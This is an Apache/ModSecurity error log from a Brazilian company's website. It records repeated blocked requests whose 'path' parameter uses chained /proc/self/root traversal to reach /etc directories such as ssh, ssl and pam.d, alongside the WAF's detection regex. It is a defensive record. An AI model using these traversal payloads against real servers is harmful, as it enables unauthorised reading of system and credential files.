[Fri Mar 20 01:41:16.987473 2026] [:error] [pid 7235:tid 140411716749056] [client 74.7.241.31:60748] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzP7PqxLDW4GITHUkSeqgAAAQM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:41:19.771055 2026] [:error] [pid 8307:tid 140411708356352] [client 74.7.241.31:43410] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzP77-FhjpZGs9ba8qgXQAAAwQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:41:24.855854 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.241.31:43418] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzP89a6ubjKNq_cu4aKgAAAA1c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:41:25.824749 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.241.31:43418] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzP9da6ubjKNq_cu4aKgwAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:41:26.249104 2026] [core:alert] [pid 5816:tid 140411699963648] [client 74.7.243.128:48212] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/usr/lib/systemd
[Fri Mar 20 01:41:30.724099 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.241.31:42236] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzP-ta6ubjKNq_cu4aKigAAA1Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:41:32.418773 2026] [:error] [pid 7235:tid 140411540502272] [client 74.7.243.128:38956] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzP_PqxLDW4GITHUkSeswAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:41:36.576774 2026] [:error] [pid 8307:tid 140411616036608] [client 74.7.241.31:42252] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzQAL-FhjpZGs9ba8qgXgAAAw8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:41:41.121783 2026] [proxy_fcgi:error] [pid 30077:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:35890] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:41:43.984495 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.241.31:32892] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzQBwkwaGbbGflqUZAAWQAAAMc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:41:51.450957 2026] [:error] [pid 5816:tid 140411582465792] [client 74.7.241.31:44040] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzQD5fmNfuxceSuAELI9wAAAdM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:42:00.210284 2026] [:error] [pid 7893:tid 140411624429312] [client 74.7.241.31:36780] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzQGBCii7xarUs8iHYevAAAAg4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:42:09.818873 2026] [:error] [pid 21219:tid 140411725141760] [client 74.7.241.31:34366] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzQIfXLqtnMIWvjpaJT_wAAAoI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:42:24.121899 2026] [proxy_fcgi:error] [pid 21219:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:37204] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:42:29.324707 2026] [:error] [pid 21219:tid 140411582465792] [client 74.7.241.31:34366] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzQNfXLqtnMIWvjpaJUCAAAApM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:42:38.410439 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.241.31:52786] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzQPgkwaGbbGflqUZAAfgAAAMs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:42:50.603262 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.241.31:45268] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzQSuoXxyEfFpUF8f9CCwAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:42:57.186193 2026] [mime_magic:error] [pid 8307:tid 140411699963648] (70014)End of file found: [client 57.141.18.13:42466] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 01:42:59.129787 2026] [proxy_fcgi:error] [pid 7235:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:38392] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:43:09.473451 2026] [:error] [pid 21219:tid 140411658000128] [client 74.7.241.31:52382] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzQXfXLqtnMIWvjpaJUGQAAAoo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:43:22.101853 2026] [proxy_fcgi:error] [pid 17653:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:39094] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:43:29.005413 2026] [:error] [pid 7893:tid 140411674785536] [client 74.7.241.31:47950] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzQcRCii7xarUs8iHYe8QAAAgg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:43:44.157793 2026] [proxy_fcgi:error] [pid 17887:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:39936] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:43:48.479459 2026] [:error] [pid 17887:tid 140411708356352] [client 74.7.241.31:46052] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzQhAkwaGbbGflqUZAAnwAAAMQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:44:01.695609 2026] [:error] [pid 30077:tid 140411649607424] [client 74.7.241.31:54136] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzQkfu8EFLIOrSqIpvdOgAAAks"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:44:06.129974 2026] [proxy_fcgi:error] [pid 17887:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:40712] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:44:11.322755 2026] [:error] [pid 21563:tid 140411641214720] [client 74.7.241.31:36096] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzQmUpm7ZmxKZTM4bZ8DgAAA4w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:44:14.197330 2026] [:error] [pid 21563:tid 140411565680384] [client 74.7.241.31:36096] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzQnkpm7ZmxKZTM4bZ8DwAAA5U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:44:18.639022 2026] [:error] [pid 5816:tid 140411548894976] [client 74.7.241.31:60880] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzQopfmNfuxceSuAELJXgAAAdc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
